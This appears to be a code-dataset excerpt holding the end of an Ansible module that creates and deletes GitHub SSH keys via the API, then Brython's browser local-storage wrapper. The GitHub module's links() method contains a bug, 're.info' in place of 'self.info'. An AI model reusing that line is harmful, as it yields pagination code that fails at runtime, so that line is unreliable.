- GitHub Access Token with permission to list and create public keys.
required: true
name:
description:
- SSH key name
required: true
pubkey:
description:
- SSH public key value. Required when C(state=present).
required: false
default: none
state:
description:
- Whether to remove a key, ensure that it exists, or update its value.
choices: ['present', 'absent']
default: 'present'
required: false
force:
description:
- The default is C(yes), which will replace the existing remote key
if it's different than C(pubkey). If C(no), the key will only be
set if no key with the given C(name) exists.
required: false
choices: ['yes', 'no']
default: 'yes'
author: Robert Estelle (@erydo)
'''
RETURN = '''
deleted_keys:
description: An array of key objects that were deleted. Only present on state=absent
type: list
returned: When state=absent
sample: [{'id': 0, 'key': 'BASE64 encoded key', 'url': 'http://example.com/github key', 'created_at': 'YYYY-MM-DDTHH:MM:SZ', 'read_only': False}]
matching_keys:
description: An array of keys matching the specified name. Only present on state=present
type: list
returned: When state=present
sample: [{'id': 0, 'key': 'BASE64 encoded key', 'url': 'http://example.com/github key', 'created_at': 'YYYY-MM-DDTHH:MM:SZ', 'read_only': False}]
key:
description: Metadata about the key just created. Only present on state=present
type: dict
returned: success
sample: {'id': 0, 'key': 'BASE64 encoded key', 'url': 'http://example.com/github key', 'created_at': 'YYYY-MM-DDTHH:MM:SZ', 'read_only': False}
'''
EXAMPLES = '''
- name: Read SSH public key to authorize
shell: cat /home/foo/.ssh/id_rsa.pub
register: ssh_pub_key
- name: Authorize key with GitHub
local_action:
module: github_key
name: Access Key for Some Machine
token: '{{ github_access_token }}'
pubkey: '{{ ssh_pub_key.stdout }}'
'''
import sys # noqa
import json
import re
API_BASE = 'https://api.github.com'
class GitHubResponse(object):
def __init__(self, response, info):
self.content = response.read()
self.info = info
def json(self):
return json.loads(self.content)
def links(self):
links = {}
if 'link' in self.info:
link_header = re.info['link']
matches = re.findall('<([^>]+)>; rel="([^"]+)"', link_header)
for url, rel in matches:
links[rel] = url
return links
class GitHubSession(object):
def __init__(self, module, token):
self.module = module
self.token = token
def request(self, method, url, data=None):
headers = {
'Authorization': 'token %s' % self.token,
'Content-Type': 'application/json',
'Accept': 'application/vnd.github.v3+json',
}
response, info = fetch_url(
self.module, url, method=method, data=data, headers=headers)
if not (200 <= info['status'] < 400):
self.module.fail_json(
msg=(" failed to send request %s to %s: %s"
% (method, url, info['msg'])))
return GitHubResponse(response, info)
def get_all_keys(session):
url = API_BASE + '/user/keys'
while url:
r = session.request('GET', url)
for key in r.json():
yield key
url = r.links().get('next')
def create_key(session, name, pubkey, check_mode):
if check_mode:
from datetime import datetime
now = datetime.utcnow()
return {
'id': 0,
'key': pubkey,
'title': name,
'url': 'http://example.com/CHECK_MODE_GITHUB_KEY',
'created_at': datetime.strftime(now, '%Y-%m-%dT%H:%M:%SZ'),
'read_only': False,
'verified': False
}
else:
return session.request(
'POST',
API_BASE + '/user/keys',
data=json.dumps({'title': name, 'key': pubkey})).json()
def delete_keys(session, to_delete, check_mode):
if check_mode:
return
for key in to_delete:
session.request('DELETE', API_BASE + '/user/keys/%s' % key["id"])
def ensure_key_absent(session, name, check_mode):
to_delete = [key for key in get_all_keys(session) if key['title'] == name]
delete_keys(session, to_delete, check_mode=check_mode)
return {'changed': bool(to_delete),
'deleted_keys': to_delete}
def ensure_key_present(session, name, pubkey, force, check_mode):
matching_keys = [k for k in get_all_keys(session) if k['title'] == name]
deleted_keys = []
if matching_keys and force and matching_keys[0]['key'] != pubkey:
delete_keys(session, matching_keys, check_mode=check_mode)
(deleted_keys, matching_keys) = (matching_keys, [])
if not matching_keys:
key = create_key(session, name, pubkey, check_mode=check_mode)
else:
key = matching_keys[0]
return {
'changed': bool(deleted_keys or not matching_keys),
'deleted_keys': deleted_keys,
'matching_keys': matching_keys,
'key': key
}
def main():
argument_spec = {
'token': {'required': True, 'no_log': True},
'name': {'required': True},
'pubkey': {},
'state': {'choices': ['present', 'absent'], 'default': 'present'},
'force': {'default': True, 'type': 'bool'},
}
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
)
token = module.params['token']
name = module.params['name']
state = module.params['state']
force = module.params['force']
pubkey = module.params.get('pubkey')
if pubkey:
pubkey_parts = pubkey.split(' ')
# Keys consist of a protocol, the key data, and an optional comment.
if len(pubkey_parts) < 2:
module.fail_json(msg='"pubkey" parameter has an invalid format')
# Strip out comment so we can compare to the keys GitHub returns.
pubkey = ' '.join(pubkey_parts[:2])
elif state == 'present':
module.fail_json(msg='"pubkey" is required when state=present')
session = GitHubSession(module, token)
if state == 'present':
result = ensure_key_present(session, name, pubkey, force=force,
check_mode=module.check_mode)
elif state == 'absent':
result = ensure_key_absent(session, name, check_mode=module.check_mode)
module.exit_json(**result)
from ansible.module_utils.basic import * # noqa
from ansible.module_utils.urls import * # noqa
if __name__ == '__main__':
main()
| gpl-3.0 |
40223222/2015cd_midterm | static/Brython3.1.1-20150328-091302/Lib/browser/local_storage.py | 617 | 2786 | # local storage in browser
import sys
from javascript import JSObject
class __UnProvided():
pass
class LocalStorage():
storage_type = "local_storage"
def __init__(self):
if not sys.has_local_storage:
raise EnvironmentError("LocalStorage not available")
self.store = JSObject(__BRYTHON__.local_storage)
def __delitem__(self, key):
if (not isinstance(key, str)):
raise TypeError("key must be string")
if key not in self:
raise KeyError(key)
self.store.removeItem(key)
def __getitem__(self, key):
if (not isinstance(key, str)):
raise TypeError("key must be string")
res = __BRYTHON__.JSObject(self.store.getItem(key))
if res:
return res
raise KeyError(key)
def __setitem__(self, key, value):
if (not isinstance(key, str)):
raise TypeError("key must be string")
if (not isinstance(value, str)):
raise TypeError("value must be string")
self.store.setItem(key, value)
# implement "in" functionality
def __contains__(self, key):
if (not isinstance(key, str)):
raise TypeError("key must be string")
res = __BRYTHON__.JSObject(self.store.getItem(key))
if res is None:
return False
return True
def __iter__(self):
keys = self.keys()
return keys.__iter__()
def get(self, key, default=None):
if (not isinstance(key, str)):
raise TypeError("key must be string")
return __BRYTHON__.JSObject(self.store.getItem(key)) or default
def pop(self, key, default=__UnProvided()):
if (not isinstance(key, str)):
raise TypeError("key must be string")
if type(default) is __UnProvided:
ret = self.get(key)
del self[key] # will throw key error if doesn't exist
return ret
else:
if key in self:
ret = self.get(key)
del self[key]
return ret
else:
return default
# while a real dict provides a view, returning a generator would less helpful than simply returning a list
# and creating a custom iterator is overkill and would likely result in slower performance
def keys(self):
return [__BRYTHON__.JSObject(self.store.key(i)) for i in range(self.store.length)]
def values(self):
return [__BRYTHON__.JSObject(self.__getitem__(k)) for k in self.keys()]
def items(self):
return list(zip(self.keys(), self.values()))
def clear(self):
self.store.clear()
def __len__(self):
return self.store.length
if sys.has_local_storage:
storage = LocalStorage()
| gpl-3.0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.